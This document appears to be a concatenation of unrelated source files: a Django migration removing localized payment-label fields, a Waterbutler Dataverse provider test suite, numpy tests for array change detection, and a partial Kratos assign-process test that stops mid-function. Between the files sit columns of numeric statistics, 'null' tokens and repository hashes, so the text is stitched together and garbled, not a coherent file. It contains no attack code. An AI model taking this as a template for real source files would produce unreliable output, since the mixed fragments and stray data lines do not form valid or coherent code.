# Generated by Django 3.1.11 on 2021-05-31 06:53 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('site_settings', '0025_usermetafield_clean_name'), ] operations = [ migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='_2c2p_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='manual_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_instructions_text_zh_hant', ), 
migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_en', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='offline_thankyou_text_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='paypal_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_id_id', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='paypal_legacy_frontend_label_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_en', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_id_id', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_ms', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_tl', ), migrations.RemoveField( model_name='sitesettings', name='signup_footer_text_zh_hant', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_en', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_id_id', ), migrations.RemoveField( 
model_name='sitesettings', name='stripe_frontend_label_ms', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_tl', ), migrations.RemoveField( model_name='sitesettings', name='stripe_frontend_label_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='choices_en', ), migrations.RemoveField( model_name='usermetafield', name='choices_id_id', ), migrations.RemoveField( model_name='usermetafield', name='choices_ms', ), migrations.RemoveField( model_name='usermetafield', name='choices_tl', ), migrations.RemoveField( model_name='usermetafield', name='choices_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='default_value_en', ), migrations.RemoveField( model_name='usermetafield', name='default_value_id_id', ), migrations.RemoveField( model_name='usermetafield', name='default_value_ms', ), migrations.RemoveField( model_name='usermetafield', name='default_value_tl', ), migrations.RemoveField( model_name='usermetafield', name='default_value_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='help_text_en', ), migrations.RemoveField( model_name='usermetafield', name='help_text_id_id', ), migrations.RemoveField( model_name='usermetafield', name='help_text_ms', ), migrations.RemoveField( model_name='usermetafield', name='help_text_tl', ), migrations.RemoveField( model_name='usermetafield', name='help_text_zh_hant', ), migrations.RemoveField( model_name='usermetafield', name='label_en', ), migrations.RemoveField( model_name='usermetafield', name='label_id_id', ), migrations.RemoveField( model_name='usermetafield', name='label_ms', ), migrations.RemoveField( model_name='usermetafield', name='label_tl', ), migrations.RemoveField( model_name='usermetafield', name='label_zh_hant', ), ]
30.682482
59
0.557749
680
8,407
6.498529
0.076471
0.308893
0.382439
0.441276
0.96334
0.96334
0.96334
0.880516
0.698574
0.291695
0
0.005461
0.346497
8,407
273
60
30.794872
0.798872
0.005472
0
0.730337
1
0
0.274674
0.148582
0
0
0
0
0
1
0
false
0
0.003745
0
0.014981
0
0
0
0
null
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
818b8178cee287565d6faee7b38b70b412d968e1
18,607
py
Python
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
tests/providers/dataverse/test_provider.py
laurenrevere/waterbutler
4f358d94376997cd9592b18b67d13a7482c7aa2a
[ "Apache-2.0" ]
null
null
null
import pytest from tests.utils import async import io import json import aiohttpretty from waterbutler.core import streams from waterbutler.core import exceptions from waterbutler.providers.dataverse import settings as dvs from waterbutler.providers.dataverse import DataverseProvider from waterbutler.providers.dataverse.metadata import DataverseFileMetadata @pytest.fixture def auth(): return { 'name': 'cat', 'email': 'cat@cat.com', } @pytest.fixture def credentials(): return {'token': 'wrote harry potter'} @pytest.fixture def settings(): return { 'host': 'myfakehost.dataverse.org', 'doi': 'doi:10.5072/FK2/ABCDEF', 'id': '18', 'name': 'A look at wizards', } @pytest.fixture def provider(auth, credentials, settings): return DataverseProvider(auth, credentials, settings) @pytest.fixture def file_content(): return b'SLEEP IS FOR THE WEAK GO SERVE STREAMS' @pytest.fixture def file_like(file_content): return io.BytesIO(file_content) @pytest.fixture def file_stream(file_like): return streams.FileStreamReader(file_like) @pytest.fixture def native_file_metadata(): return {'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73d734-8383551cc713', 'id': 20, 'md5': 'acbd18db4cc2f85cedef654fccc4a4d8', 'name': 'thefile.txt', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'thefile.txt', 'version': 1} @pytest.fixture def native_dataset_metadata(): return {'data': {'createTime': '2015-04-02T13:21:59Z', 'distributionDate': 'Distribution Date', 'files': [{'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73c684-4b22a1757aed', 'id': 19, 'md5': '2243b9249ca96f7cca9f58f7584b5ddb', 'name': 'UnZip.java', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': 
'', 'label': 'UnZip.java', 'version': 1}, {'datafile': {'contentType': 'text/plain; charset=US-ASCII', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73d734-8383551cc713', 'id': 20, 'md5': 'acbd18db4cc2f85cedef654fccc4a4d8', 'name': 'thefile.txt', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'thefile.txt', 'version': 1}, {'datafile': {'contentType': 'application/octet-stream', 'description': '', 'filename': '%2Fusr%2Flocal%2Fglassfish4%2Fglassfish%2Fdomains%2Fdomain1%2Ffiles%2F10.5072%2FFK2%2F232XYH%2F14c7a73e419-b578b719b05c', 'id': 21, 'md5': 'ee5a34fe861617916acde862d4206280', 'name': 'UnZip.class', 'originalFormatLabel': 'UNKNOWN'}, 'datasetVersionId': 5, 'description': '', 'label': 'UnZip.class', 'version': 1}], 'id': 5, 'lastUpdateTime': '2015-04-02T15:26:21Z', 'metadataBlocks': {'citation': {'displayName': 'Citation Metadata', 'fields': [{'multiple': False, 'typeClass': 'primitive', 'typeName': 'title', 'value': 'A look at wizards'}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'author', 'value': [{'authorName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'authorName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'datasetContact', 'value': [{'datasetContactEmail': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactEmail', 'value': 'email@email.com'}, 'datasetContactName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'dsDescription', 'value': [{'dsDescriptionValue': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dsDescriptionValue', 'value': 'desc'}}]}, {'multiple': True, 'typeClass': 'controlledVocabulary', 'typeName': 'subject', 'value': ['Other']}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 
'depositor', 'value': 'Baggins, Bilbo'}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dateOfDeposit', 'value': '2015-04-02'}]}}, 'productionDate': 'Production Date', 'releaseTime': '2015-04-02T15:26:21Z', 'versionMinorNumber': 0, 'versionNumber': 1, 'versionState': 'RELEASED'}} @pytest.fixture def empty_native_dataset_metadata(): return {'data': {'createTime': '2015-04-02T13:21:59Z', 'distributionDate': 'Distribution Date', 'files': [], 'id': 5, 'lastUpdateTime': '2015-04-02T15:26:21Z', 'metadataBlocks': {'citation': {'displayName': 'Citation Metadata', 'fields': [{'multiple': False, 'typeClass': 'primitive', 'typeName': 'title', 'value': 'A look at wizards'}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'author', 'value': [{'authorName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'authorName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'datasetContact', 'value': [{'datasetContactEmail': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactEmail', 'value': 'email@email.com'}, 'datasetContactName': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'datasetContactName', 'value': 'Baggins, Bilbo'}}]}, {'multiple': True, 'typeClass': 'compound', 'typeName': 'dsDescription', 'value': [{'dsDescriptionValue': {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dsDescriptionValue', 'value': 'desc'}}]}, {'multiple': True, 'typeClass': 'controlledVocabulary', 'typeName': 'subject', 'value': ['Other']}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'depositor', 'value': 'Baggins, Bilbo'}, {'multiple': False, 'typeClass': 'primitive', 'typeName': 'dateOfDeposit', 'value': '2015-04-02'}]}}, 'productionDate': 'Production Date', 'releaseTime': '2015-04-02T15:26:21Z', 'versionMinorNumber': 0, 'versionNumber': 1, 'versionState': 'RELEASED'}} class TestCRUD: @async @pytest.mark.aiohttpretty def test_download(self, provider, native_dataset_metadata): path 
= '/21' url = provider.build_url(dvs.DOWN_BASE_URL, path, key=provider.token) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_uri('GET', url, body=b'better', auto_length=True) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) result = yield from provider.download(path) content = yield from result.read() assert content == b'better' @async @pytest.mark.aiohttpretty def test_download_not_found(self, provider, native_dataset_metadata): path = '/21' url = provider.build_url(dvs.DOWN_BASE_URL, path, key=provider.token) aiohttpretty.register_uri('GET', url, status=404) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) with pytest.raises(exceptions.DownloadError): yield from provider.download(path) @async @pytest.mark.aiohttpretty def test_download_invalid_path(self, provider, native_dataset_metadata): path = '/50' draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = 
yield from provider.validate_path(path) with pytest.raises(exceptions.NotFoundError): yield from provider.download(path) @async @pytest.mark.aiohttpretty def test_upload_create(self, provider, file_stream, native_file_metadata, empty_native_dataset_metadata, native_dataset_metadata): path = '/thefile.txt' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'study', provider.doi) aiohttpretty.register_uri('POST', url, status=201) latest_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) latest_published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', latest_published_url, body={'data': {'files': []}}) aiohttpretty.register_uri('GET', latest_url, responses=[ { 'status': 200, 'body': json.dumps(empty_native_dataset_metadata).encode('utf-8'), 'headers': {'Content-Type': 'application/json'}, }, { 'status': 200, 'body': json.dumps(native_dataset_metadata).encode('utf-8'), 'headers': {'Content-Type': 'application/json'}, }, ]) path = yield from provider.validate_path(path) metadata, created = yield from provider.upload(file_stream, path) entry = native_file_metadata['datafile'] expected = DataverseFileMetadata(entry, 'latest').serialized() assert created is True assert metadata == expected assert aiohttpretty.has_call(method='POST', uri=url) assert aiohttpretty.has_call(method='GET', uri=latest_url) assert aiohttpretty.has_call(method='GET', uri=latest_published_url) @async @pytest.mark.aiohttpretty def test_upload_updates(self, provider, file_stream, native_file_metadata, native_dataset_metadata): path = '/20' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'study', provider.doi) aiohttpretty.register_uri('POST', url, status=201) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) 
delete_url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'file', '/20') # Old file id aiohttpretty.register_json_uri('DELETE', delete_url, status=204) latest_published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', latest_published_url, body={'data': {'files': []}}) path = yield from provider.validate_path(path) metadata, created = yield from provider.upload(file_stream, path) entry = native_file_metadata['datafile'] expected = DataverseFileMetadata(entry, 'latest').serialized() assert metadata == expected assert created is False assert aiohttpretty.has_call(method='POST', uri=url) assert aiohttpretty.has_call(method='GET', uri=published_url) @async @pytest.mark.aiohttpretty def test_delete_file(self, provider, native_dataset_metadata): path = '21' url = provider.build_url(dvs.EDIT_MEDIA_BASE_URL, 'file', path) aiohttpretty.register_json_uri('DELETE', url, status=204) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path(path) yield from provider.delete(path) assert aiohttpretty.has_call(method='DELETE', uri=url) # @async # @pytest.mark.aiohttpretty # def test_delete_file_invalid_path(self, provider, native_dataset_metadata): # path = '500' # draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) # aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) # published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) # aiohttpretty.register_json_uri('GET', 
published_url, status=200, body=native_dataset_metadata) # with pytest.raises(exceptions.MetadataError): # yield from provider.delete(path) class TestMetadata: @async @pytest.mark.aiohttpretty def test_metadata(self, provider, native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest') assert len(result) == 3 assert result[0]['provider'] == 'dataverse' assert result[0]['kind'] == 'file' assert result[0]['name'] == 'UnZip.java' assert result[0]['path'] == '/19' assert result[0]['extra']['fileId'] == '19' @async @pytest.mark.aiohttpretty def test_metadata_no_files(self, provider, empty_native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=empty_native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest') assert result == [] @async @pytest.mark.aiohttpretty def test_metadata_published(self, provider, native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest-published') assert len(result) == 3 assert result[0]['provider'] == 'dataverse' assert result[0]['kind'] == 'file' assert result[0]['name'] == 'UnZip.java' assert result[0]['path'] == '/19' assert result[0]['extra']['fileId'] == '19' @async @pytest.mark.aiohttpretty def test_metadata_published_no_files(self, provider, empty_native_dataset_metadata): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 
'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=200, body=empty_native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path, version='latest-published') assert result == [] @async @pytest.mark.aiohttpretty def test_draft_metadata_missing(self, provider): url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', url, status=404) path = yield from provider.validate_path('/') with pytest.raises(exceptions.MetadataError): yield from provider.metadata(path, version='latest') @async @pytest.mark.aiohttpretty def test_draft_metadata_no_state_catches_all(self, provider, native_dataset_metadata): draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path) assert isinstance(result, list) assert len(result) == 6 @async @pytest.mark.aiohttpretty def test_metadata_never_published(self, provider, native_dataset_metadata): published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=404) draft_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest'), key=provider.token) aiohttpretty.register_json_uri('GET', draft_url, status=200, body=native_dataset_metadata) path = yield from provider.validate_path('/') result = yield from provider.metadata(path) assert len(result) == 3 @async @pytest.mark.aiohttpretty def test_metadata_never_published_raises_errors(self, 
provider, native_dataset_metadata): published_url = provider.build_url(dvs.JSON_BASE_URL.format(provider._id, 'latest-published'), key=provider.token) aiohttpretty.register_json_uri('GET', published_url, status=400) path = yield from provider.validate_path('/') with pytest.raises(exceptions.MetadataError) as e: result = yield from provider.metadata(path) assert e.value.code == 400
40.101293
138
0.675928
2,066
18,607
5.899806
0.119555
0.039462
0.063746
0.046763
0.876282
0.844696
0.844696
0.810239
0.775371
0.754205
0
0.031893
0.182727
18,607
463
139
40.187905
0.769646
0.034718
0
0.714667
0
0.010667
0.231211
0.037551
0
0
0
0
0.077333
0
null
null
0
0.026667
null
null
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
8195f7feb3b7500d1838c7d287d97e45da55851f
3,942
py
Python
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
18
2019-05-03T02:08:12.000Z
2022-03-24T11:49:59.000Z
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
76
2019-04-03T15:24:01.000Z
2022-03-01T14:07:04.000Z
polliwog/polyline/test_array.py
lace/polliwog
7744ce171738e4739e391fcff4f4689d9f177196
[ "BSD-2-Clause" ]
3
2019-11-04T16:22:07.000Z
2022-03-09T08:50:52.000Z
import numpy as np from ._array import find_changes, find_repeats def test_find_repeats(): example = np.array([0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0]) np.testing.assert_array_equal( find_repeats(example, wrap=False), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, True, ] ), ) np.testing.assert_array_equal( find_repeats(example, wrap=True), np.array( [ True, False, True, True, False, True, True, True, False, False, False, True, False, True, ] ), ) example[-1] = 1 np.testing.assert_array_equal( find_repeats(example, wrap=False), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, False, ] ), ) np.testing.assert_array_equal( find_repeats(example, wrap=True), np.array( [ False, False, True, True, False, True, True, True, False, False, False, True, False, False, ] ), ) def test_find_changes(): example = np.array([0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0]) np.testing.assert_array_equal( find_changes(example, wrap=False), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, False, ] ), ) np.testing.assert_array_equal( find_changes(example, wrap=True), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, False, ] ), ) example[-1] = 1 np.testing.assert_array_equal( find_changes(example, wrap=False), np.array( [ False, True, False, False, True, False, False, False, True, True, True, False, True, True, ] ), ) np.testing.assert_array_equal( find_changes(example, wrap=True), np.array( [ True, True, False, False, True, False, False, False, True, True, True, False, True, True, ] ), )
21.540984
66
0.296043
267
3,942
4.254682
0.074906
0.229754
0.184859
0.150528
0.922535
0.922535
0.915493
0.915493
0.915493
0.899648
0
0.022023
0.631405
3,942
182
67
21.659341
0.759807
0
0
0.840909
0
0
0
0
0
0
0
0
0.045455
1
0.011364
false
0
0.011364
0
0.022727
0
0
0
0
null
1
1
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
819a0188456b2fb2f6c029ebcc56072dc4c4812f
69,474
py
Python
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
2
2020-04-30T19:13:08.000Z
2021-04-14T19:40:47.000Z
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
1
2020-04-30T19:19:09.000Z
2020-05-02T14:22:36.000Z
kratos/tests/test_processes.py
AndreaVoltan/MyKratos7.0
e977752722e8ef1b606f25618c4bf8fd04c434cc
[ "BSD-4-Clause" ]
1
2020-06-12T08:51:24.000Z
2020-06-12T08:51:24.000Z
from __future__ import print_function, absolute_import, division import KratosMultiphysics.KratosUnittest as KratosUnittest from KratosMultiphysics import * import KratosMultiphysics.kratos_utilities as kratos_utils import math import os def GetFilePath(fileName): return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName) class TestProcesses(KratosUnittest.TestCase): def test_assign_processes(self): current_model = Model() model_part= current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part.AddNodalSolutionStepVariable(DENSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #reset all data for node in model_part.Nodes: node.Free(DISPLACEMENT_X) node.Free(DISPLACEMENT_Y) node.Free(DISPLACEMENT_Z) node.Free(VELOCITY_X) node.Free(VELOCITY_Y) node.Free(VELOCITY_Z) node.SetSolutionStepValue(DENSITY,0,0.0) node.SetSolutionStepValue(VISCOSITY,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_X,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Y,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Z,0,0.0) node.SetSolutionStepValue(VELOCITY_X,0,0.0) node.SetSolutionStepValue(VELOCITY_Y,0,0.0) node.SetSolutionStepValue(VELOCITY_Z,0,0.0) settings = Parameters( """ { "process_list" : [ { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [0.0, 10.0], "constrained" : true, "value" : "x+100.0*y*t**2" } }, { "python_module" : "assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DENSITY", "value" : "x*x+y*y+z*z+t" } }, { "python_module" : 
"assign_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT_X", "interval" : [0.0, 5.0], "constrained" : true, "value" : "sqrt(x**2+y**2)*t", "local_axes" :{ "origin" : [0.0, 0.0, 0.0], "axes" : [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0] ] } } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [11.0, 15.0], "value" : [10.0, null, "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [11.0, 15.0], "modulus" : 10.0, "constrained" : false, "direction" : [1.0, 0.0, 0.0], "local_axes" : {} } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [20.0, 24.0], "constrained" : false, "value" : [10.0, null, "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [20.0, 24.0], "modulus" : "sin(x*pi*t)", "constrained" : false, "direction" : [0.0, 1.0, 0.0], "local_axes" : {} } }, { "python_module" : "assign_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT", "interval" : [25.0, "End"], "constrained" : [true,true,false], 
"value" : [null, "x+y*t", "t"], "local_axes" : {} } }, { "python_module" : "assign_vector_by_direction_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignVectorByDirectionProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "interval" : [25.0, "End"], "modulus" : "sqrt(abs(x*y))", "constrained" : true, "direction" : [0.0, 1.0, 1.0], "local_axes" : {} } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 3 - both within the active interval model_part.CloneTimeStep(3.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), math.sqrt(node.X**2+node.Y**2)*t) self.assertEqual(node.GetSolutionStepValue(DENSITY), node.X**2+node.Y**2+node.Z**2+t) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), node.X+100.0*node.Y*t**2) self.assertTrue(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result t = model_part.ProcessInfo[TIME] for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) 